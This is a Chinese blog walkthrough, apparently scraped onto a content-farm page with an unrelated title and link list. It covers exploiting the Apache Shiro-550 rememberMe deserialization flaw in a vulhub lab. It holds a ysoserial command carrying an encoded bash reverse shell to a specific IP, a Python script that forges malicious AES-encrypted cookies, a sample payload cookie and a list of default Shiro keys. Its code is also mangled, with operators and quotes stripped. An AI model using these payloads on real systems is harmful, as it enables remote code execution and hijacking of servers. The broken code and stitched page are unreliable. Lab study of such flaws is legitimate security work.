当前位置: 首页 > news >正文

昆明网站建设方案托管口碑营销渠道

昆明网站建设方案托管,口碑营销渠道,网站域名怎么查询,济南中建设计院有限公司网站目录 Shiro简介 复现流程 工具一把梭 半脚本半手动 原理分析 反序列化入口 常见的key 登录过程 验证过程 利用原理 Shiro简介 Apache Shiro 是一个强大且易于使用的 Java 安全框架#xff0c;用于身份验证、授权、加密和会话管理等安全功能。Shiro 的设计目标是简单…目录 Shiro简介 复现流程 工具一把梭 半脚本半手动 原理分析 反序列化入口 常见的key 登录过程 验证过程 利用原理 Shiro简介 Apache Shiro 是一个强大且易于使用的 Java 安全框架用于身份验证、授权、加密和会话管理等安全功能。Shiro 的设计目标是简单直观同时提供了全面的安全功能能够帮助开发者轻松地添加安全性到他们的应用程序中。 主要特点包括 认证AuthenticationShiro 提供了灵活且易于使用的认证机制支持多种认证方式包括基于用户名密码的认证、LDAP 认证、OAuth 认证等。 授权AuthorizationShiro 支持基于角色和权限的访问控制可以定义细粒度的权限控制策略保护应用程序中的资源。 会话管理Session ManagementShiro 管理用户会话支持本地会话存储、集群环境下的分布式会话管理并提供了会话超时、定时清理等功能。 加密CryptographyShiro 提供了常用的加密算法和工具类用于处理密码加密、数据加密等安全需求。 Web 支持Shiro 提供了与 Web 框架集成的支持可以很方便地在 Web 应用中使用 Shiro 进行安全控制。 复现流程 工具一把梭 启动vulhub靶场 先爆破密钥(shiro550的key是固定的硬编码) 再探测利用链 最后直接拿到shell命令执行 半脚本半手动 启动vulhub靶场 Runtime.exec Payload Generater | AresXs Blog 先用这个网站生成给ysoserial用的payload 用ysoserial启动一个JRMP服务器 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections5 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDAJjE}|{base64,-d}|{bash,-i}用这个脚本跑恶意cookie的payload(作用是连接到ysoserial启动的服务器) #define PY_SSIZE_T_CLEAN import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command):# 打开JRMP客户端连接到特定端口popen subprocess.Popen([java, -jar, ysoserial.jar, JRMPClient, command], stdoutsubprocess.PIPE)# 用获取到的key AES加密BS AES.block_sizepad lambda s: s ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key base64.b64decode(kPHbIxk5D2deZiIxcaaaA)# 生成随机16位长度的IViv uuid.uuid4().bytesencryptor AES.new(key, AES.MODE_CBC, iv)file_body pad(popen.stdout.read())# base64编码base64_ciphertext base64.b64encode(iv encryptor.encrypt(file_body))return base64_ciphertextif __name__ __main__:payload encode_rememberme(sys.argv[1]) print(rememberMe{0}.format(payload.decode())) python shiro.py 124.222.136.33:8888 生成的payload: rememberMeXdqwyPART24Wzqx6uxQbITZbqHNJDvYx8kyu7dAAlwMgUX5dqy3ajClFgQnOkw/vXv9Rohr1fGqnMp0032QNU9gIUPLr3trRQf0g1wq43QtV2tIlU8EHyjlEZmv1vXygubJJxaehwwKV9hNY4a/ILKzHTBN8elVvS3wnN58fKieJHGHItEZlfPqvXbvZYtr5mZvw5Bqg9yoGdyl6i4XjtBZwqqGgJ2Ea3Dmsm1Iy63RUwOagGlKBkE1kfufF3iJk/Xkz3nlTWfT5Pc0eRdjpudTQ2XDCJhBuVnwXPYUVX6UmMmRIUUBAHvZyFL/N8L1Ibrb5KfTybgwTtTbv3215WxvUroQmACFNJFC3aDR1ep4aPrZ0TA9NvOCjV2dJ22Tcrdzo34Yv3Hg最后在靶机登录时勾选rememberme(不要求能登录成功只要让cookie反序列化就行) bp抓包改cookie 监听下1337端口成功反弹shell 原理分析 反序列化入口 remember me 序列化 - AES加密 - Base64编码 - 写入Cookie 身份认证 Cookie值 -Base64解码 - AES解密 - 反序列化 常见的key kPHbIxk5D2deZiIxcaaaA (1.2.4默认key) 2AvVhdsgUs0FSA3SDFAdag 4AvVhmFLUs0KTA3Kprsdag 3AvVhmFLUs0KTA3Kprsdag wGiHplamyXlVB11UXWol8g Z3VucwAAAAAAAAAAAAAAAA 6ZmI6I2j5YR5aSn5ZOlAA ZUdsaGJuSmxibVI2ZHc9PQ 1QWLxgNYmxraMoxAXu/Iw 登录过程 验证过程 利用原理 1、先构建一个恶意命令它的作用是让漏洞服务器连接到我们启动的JRMP服务器 2、把这个命令序列化、AES加密、base64编码payload2写入到Cookie发给漏洞服务器 3、漏洞服务器base64解码、AES解密、反序列化执行恶意命令连接到JRMP服务器 4、JRMP服务器继续发送恶意payload1利用CC等通用库的漏洞执行命令
http://www.zqtcl.cn/news/624696/

相关文章:

  • 有了域名和空间怎么建网站哪些公司需要网页电商设计师
  • 网站开站备案深圳创业补贴10万
  • 圆通我做网站拉上海建站系统
  • 对于做网站有什么要求新闻发布会视频
  • 网站建设专业就业前景成都房产信息网 官网
  • 西宁网站建设公司排行网站查询域名ip解析
  • 柳州企业网站开发公司如何做网站首页图
  • 刷赞网站空间免费深圳网站制作公司排名
  • 网站内部优化策略获取网站的路径
  • 网站群 优点今天西安最新通告
  • 惠济免费网站建设设计制作的广告公司
  • 做一个网站建设装潢设计属于什么专业
  • 水处理网站源码注册销售公司流程和费用
  • 诸城网站建设0536s整站优化seo排名点击
  • 企业建设网站需注意哪些内容苏州网站怎么做
  • 浏览器打开网站网站推广软件工具
  • 网站主题编辑工具WordPress公司网站策划方案
  • 做旅游网站选什么空间搜索引擎优化策略有哪些
  • 网站备案多少钱安全网站建设与服务的关系
  • 手机端网页设计尺寸规范优化seo排名
  • 做网站业务提成多少厦门十大装修公司排名榜
  • 为什么用开源建站wordpress rss 插件
  • 语文建设投稿网站南昌做网站的公司多不多
  • 石家庄网站建设的公司功能性质网站
  • 企业网站主页模板装饰公司名字起名大全
  • 马鞍山网站设计价格如何在微信公众号内部做网站
  • 申请网站建设经费的报告生态建设网站
  • 建网站要多少钱用自己的服务器河北工程大学网站开发成本
  • 宁波网站建站公司商务网站模块设计时前台基础设施建设不包括
  • 徐州免费网站制作怎么用阿里云服务器搭建wordpress